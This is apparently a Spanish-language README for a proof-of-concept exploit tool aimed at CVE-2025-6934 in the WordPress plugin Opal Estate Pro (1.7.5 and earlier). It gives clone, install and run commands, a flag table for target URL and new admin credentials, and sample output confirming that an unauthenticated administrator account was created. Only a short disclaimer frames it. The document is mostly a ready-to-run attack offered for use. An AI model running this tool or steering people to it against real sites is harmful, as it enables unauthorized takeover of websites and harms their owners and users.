
Exploit automatizado de PoC para WordPress Opal Estate Pro que detecta versiones vulnerables, obtiene el nonce y crea cuentas de administrador no autorizadas.
CVE-2025-6934 es un exploit de prueba de concepto (PoC) dirigido al Plugin de WordPress: Opal Estate Pro ≤ 1.7.5.
Este exploit demuestra la creación de una cuenta de administrador sin autenticación.
Descargo de responsabilidad: Este PoC es solo con fines educativos. No lo uses en sistemas sin permiso.
git clone https://github.com/Rosemary1337/CVE-2025-6934.git
cd CVE-2025-6934
pip install -r requirements.txt
Requisitos:
requests,beautifulsoup4,colorama
python3 main.py -u <TARGET_URL> -mail <EMAIL> -password <PASSWORD> -user <USERNAME>
python3 main.py -u http://site.com/ -mail [email protected] -password 3xplo1tI5Fun -user r1337
| Flag | Descripción | Obligatorio | Valor por defecto |
|---|---|---|---|
-u, --url | URL del sitio objetivo | Sí | - |
-mail, --newmail | Correo para el nuevo administrador | Sí | - |
-password, --newpassword | Contraseña para el nuevo administrador | Sí | - |
-user, --username | Nombre de usuario para el nuevo administrador | No | administrator |
La consola muestra:
[•][✔][✖][i]Ejemplo:
[•] Starting Exploit...
[✔] Nonce Found: xyz123
[✔] Exploit Successful!
Username : r1337
Email : [email protected]
Password : 3xplo1tI5Fun
Role : administrator
Soy un desarrollador activo al que le gusta crear herramientas y compartir conocimientos. Puedes contactarme a través de: